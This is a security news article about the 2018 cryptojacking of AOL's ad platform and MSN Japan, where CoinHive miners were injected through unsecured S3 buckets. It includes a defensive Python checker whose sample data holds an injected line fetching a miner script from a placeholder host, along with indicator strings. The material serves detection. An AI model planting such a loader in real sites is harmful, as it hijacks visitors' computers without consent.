On March 25th, 2018, malicious hackers compromised AOL’s advertising platform and modified its script to mine Monero cryptocurrency. Researchers at Trend Micro also found that the Japanese domain of MSN’s web portal was infected by a similar script that mined Monero coins using the computing power of the site’s visitors.
According to the analysis, the compromised ads were found to be creating a large number of web miners. Notably, in the case of MSN, the mining script infected the homepage, which is the default page of Microsoft’s browser and the page that Outlook (Hotmail and Live) users are redirected to once they log out of their accounts.
Moreover, analysts identified 500 other websites infected with the same CoinHive cryptocurrency mining script used on the AOL advertising platform.
Upon further analysis, the researchers discovered that the hackers were running their campaign by hosting malicious content on unsecured Amazon Web Services (AWS) S3 buckets, apparently left open for public access by their administrators.
Unsecured AWS buckets have been creating problems for the last couple of years. When it comes to cryptocurrency mining, Tesla’s cloud server and the LA Times’ website both had their AWS buckets compromised to mine Monero cryptocurrency.
As for the web miners on AOL and MSN, the Trend Micro researchers believe that a significant number of users may have been impacted. The good news, however, is that AOL was notified about the incident and its team was quick to remove the malicious script by March 27th, 2018.
“The campaign injected malicious script at the end of a JavaScript library on the unsecured S3 buckets. Website administrators can easily check for any script injected with code similar to the one shown below or the mining domains we listed in the Indicators of Compromise section to verify if their sites have been modified,” wrote Trend Micro.
We notified the AOL team about our findings. AOL removed the injected miner and resolved the issue by March 27.
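The check Trend Micro describes for administrators can be automated by comparing each served JavaScript library with a known-good copy. The following is an added example, not code from Trend Micro or the original article; the sample file contents, the `loadScript` call and the `mining-domain.example` indicator are constructed placeholders, since the campaign's mining domains are not reproduced on this page.

```python
import hashlib

# Assumed indicator strings: "coinhive" is the miner named in the article;
# "mining-domain.example" is a placeholder, not a real campaign domain.
INDICATORS = (b"coinhive", b"mining-domain.example")

# Constructed sample data: a known-good library and what the bucket now serves.
GOOD = b"function track(e){return e.id;}\n"
SERVED = GOOD + b';loadScript("https://mining-domain.example/coinhive.min.js");\n'


def check_library(baseline: bytes, deployed: bytes) -> dict:
    """Classify a deployed JS file against its known-good baseline."""
    clean = {"status": "clean", "tail": b"", "indicators": []}
    if hashlib.sha256(deployed).digest() == hashlib.sha256(baseline).digest():
        return clean
    core = baseline.rstrip()
    if deployed.startswith(core):
        # Original content intact with extra bytes after it: the pattern
        # described above (script injected at the end of a library).
        tail = deployed[len(core):].strip()
        if not tail:
            return clean  # only trailing whitespace differs
        status, suspect = "appended", tail
    else:
        # Changed somewhere other than the end: treat the whole file as suspect.
        status, suspect, tail = "modified", deployed, b""
    hits = [i.decode() for i in INDICATORS if i in suspect.lower()]
    return {"status": status, "tail": tail, "indicators": hits}


def audit(baselines: dict, served: dict) -> dict:
    """Return a finding for every served file that is not provably clean."""
    findings = {}
    for name, content in served.items():
        if name not in baselines:
            findings[name] = {"status": "no-baseline", "tail": b"", "indicators": []}
            continue
        result = check_library(baselines[name], content)
        if result["status"] != "clean":
            findings[name] = result
    return findings


if __name__ == "__main__":
    for name, f in audit({"lib.js": GOOD}, {"lib.js": SERVED}).items():
        print(name, f["status"], f["indicators"], f["tail"][:80])
```

A file reported as `appended` or `modified` warrants review even when no indicator string matches, because the baseline comparison does not depend on knowing the miner's domains in advance.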
This is not the first time a top-notch website has had its advertising platform compromised. In January this year, hackers used ad slots on YouTube to mine Monero cryptocurrency through CoinHive JavaScript code.
“Organizations should secure and always properly configure their servers to prevent these types of threats. To further protect themselves, they should choose the right cloud security solution based on their specific needs,” the researchers concluded.
There are several ways of blocking cryptocurrency miners from using your browser and CPU power, including the minerBlock and No Coin extensions on the Chrome Web Store, which were developed for the sole purpose of blocking cryptocurrency mining and cryptojacking. Both extensions are open source, and users can check out the source code on GitHub.
Working as a cyber security solutions architect, Alisa focuses on application and network security. Before joining us, she held cyber security researcher positions within a variety of cyber security start-ups. She also has experience in different industry domains such as finance, healthcare and consumer products.